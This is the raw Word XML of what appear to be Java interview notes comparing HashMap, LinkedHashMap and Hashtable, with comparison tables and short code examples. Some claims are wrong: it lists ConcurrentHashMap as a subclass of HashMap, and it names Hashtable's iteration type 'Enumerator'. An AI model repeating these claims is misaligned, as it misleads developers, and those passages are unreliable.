    <w:p w14:paraId="4EE18569" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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cessOrder flag, if set to true, ensures that the map maintains the order of access rather than insertion order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7F51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90D87">
          <v:rect id="_x0000_i1447" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E118AE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20AB82D" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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thread safety is required, you must use synchronization or alternatives like ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504884A4"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8D216">
          <v:rect id="_x0000_i1448" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09156FC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2511"/>
        <w:gridCol w:w="5302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="087C6AE7" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="166EFEB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E73E5"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0020E1A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r>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6E95A3A7" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="281DE7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 of Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E37A7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pecific order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="582A6C9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optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="195D3005" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DB4334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521181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O(1) for operations)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61A531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extra overhead (O(1) for operations)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="563E96D5" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2707F60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verhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777625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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A8CCA6E"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due to linked list for ordering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7929ADB3" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A2D3E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4B235F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collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73CC216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ed collections (insertion/access order)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="61BE1766" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EF9AB0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 Order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B23274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predictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EA597D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table (insertion or access order)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3E77C4D5" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5494823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structor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6055445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HashMap()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422C745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LinkedHashMap()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3E0559BB" w14:textId="77777777" w:rsidTr="00FF1E10">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C7050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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5519D6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B49EC9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 with a constructor flag (accessOrder)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E5039B7"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03889">
          <v:rect id="_x0000_i1449" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C3191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55A5771E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7A0D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64294B3" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334F782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0AC099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D8309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Integer&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC439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584A60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386DD474"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687C3CE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9772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49D226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6B3EBB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A014F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2096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E3F5F93" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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not be in any particular order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60427C3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Insertion Order):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A446E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46404470" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8E4BB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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC5D5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95979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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E6470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25401E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7E9917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467E15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FFAA8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043ED47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7968B8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FBC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93963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6A3D5" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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utput will be 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0EF7F2EE"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592F520D"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076BA267"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47420F8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Access Order):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B6EA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6AB12C73" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A03169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AccessOrderExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5385638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F4854B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16, 0.75f, true); // Access order enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6B11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23C9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44E48C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0EDFAAD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35AAF64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B7677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some elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6908763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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AB71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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401CB020" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279DA28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terating will show that "Apple" and "Banana" are moved to the end due to access order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656FF16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28CBB4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3BF9A2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D098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631E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94EBBE" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A24B1CB"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3CC55D16"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7A90F280"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25B40CB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pple" and "Banana" were accessed, so they moved to the end in the access order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5879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0EEA090"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When you do not care about the order of the elements and you need the fastest performance for lookups and insertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D929AE5"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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to maintain the order of insertion or the order in which the elements were accessed (e.g., for cache implementation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C1AA08" w14:textId="5A1A8440" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC881C1" w14:textId="69147530" w:rsidR="00220548" w:rsidRPr="00CE4B95" w:rsidRDefault="00220548">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc197867352"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and HashTable?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w14:paraId="75B09FC6" w14:textId="741BFBFD" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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 xml:space="preserve"> are part of the Java Collections Framework and are used to store key-value pairs. However, there are some important differences between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE649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30D6">
          <v:rect id="_x0000_i1451" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B950656"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5F20EE27"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5D3100"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HashMap is not synchronized, meaning it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multiple threads access a HashMap concurrently and at least one of them modifies it, it must be externally synchronized to avoid concurrent modification issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D96E1"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2F021353"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Hashtable is </w:t>
      </w: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meaning it is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1F66D2">
          <v:rect id="_x0000_i1452" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FBA9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ull Keys and Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946D3B4"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D3482D9"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap 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228C8C3C"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4ECA5A1"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 xml:space="preserve">: Hashtable does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not allow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> any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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If you try to insert a null key or value, it will throw a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059ABE1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86167">
          <v:rect id="_x0000_i1453" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A954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25BE7FDE"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83C39C6"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HashMap is generally faster than Hashtable because it is not synchronized. It is suitable for single-threaded applications or when thread synchronization is handled externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59811767"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486BA648"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Due to synchronization, Hashtable tends to be slower than HashMap for most operations in multi-threaded scenarios. The overhead of synchronization reduces its performance in comparison to HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6E62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8177">
          <v:rect id="_x0000_i1454" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="234869B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or vs Enumerator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D765E"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B82AD8C"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hMap use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iterate over the entries. The Iterator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meaning it will throw a ConcurrentModificationException if the map is modified while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F488C94"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D45F6DD"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Hashtable uses </w:t>
      </w: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to iterate over the entries, which is considered obsolete. It does not support the fail-fast behavior like Iterator. In addition, Hashtable also provides a keySet() method for iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C41B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7DC6BEE">
          <v:rect id="_x0000_i1455" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712FE78"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egacy vs Modern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB949BD"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54EB327"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ern Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap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introduced in Java 1.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B8A55"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23683F9"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Hashtable is considered a </w:t>
      </w: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It was part of the original version of Java, introduced in Java 1.0. It has been largely replaced by newer classes like HashMap, though it is still available for backward compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071978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2537B0">
          <v:rect id="_x0000_i1456" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D03A5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ynchronization Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A0872"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C02E124"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Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap does not provide synchronization, so you must manually handle thread safety (e.g., using Collections.synchronizedMap() or other concurrency mechanisms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15841938"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7C825A1"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 by Default</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hashtable provides automatic synchronization, which ensures thread safety but may lead to performance issues due to locking overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24585261"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D65DE9">
          <v:rect id="_x0000_i1457" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D12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6C92183C"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B8A0B8"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commended for Single-Threaded</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ternally Synchronized Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use HashMap for most modern applications, especially when thread safety is not a primary concern or is managed externally (e.g., using ConcurrentHashMap for multi-threaded environments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA947A"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C1ED9CD"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Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use Hashtable only when maintaining compatibility with legacy code that requires its specific behavior. It's rarely used in new code due to its performance drawbacks and thread synchronization issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169639E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DA0F7">
          <v:rect id="_x0000_i1458" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C38481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bclasses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363310F2"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01DE549"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Map has subclasses like LinkedHashMap and ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F20565"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0C5F8C3"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table has subclasses like Properties (which is used for storing key-value pairs in a more specific manner, often for configuration purposes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E54175"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74FE2A">
          <v:rect id="_x0000_i1459" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CFF9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4226"/>
        <w:gridCol w:w="3564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="678FB3A5" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78B544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D083EA3"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2057E8E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r>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6B584C29" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEBC23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85B84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not synchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75FC4E6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ynchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="631BEFCF" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="356EA839"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713858C3"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and multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B22AA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 or values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="271EE7E1" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41CBC48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413FFB5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or externally synchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E9AE3B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962441" w:rsidRPr="00CE4B95" w14:paraId="26B6B63C" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67B27B0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Enumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4525AE2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terator (fail-fast)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5196F15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Enumerator (no fail-fast)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="45BCE229" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A79E4C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Modern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="414A7CF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n class (Java 1.2 and onwards)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61A9AF7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Java 1.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="0C7A84F4" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A3D23B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 Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169142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w:t>
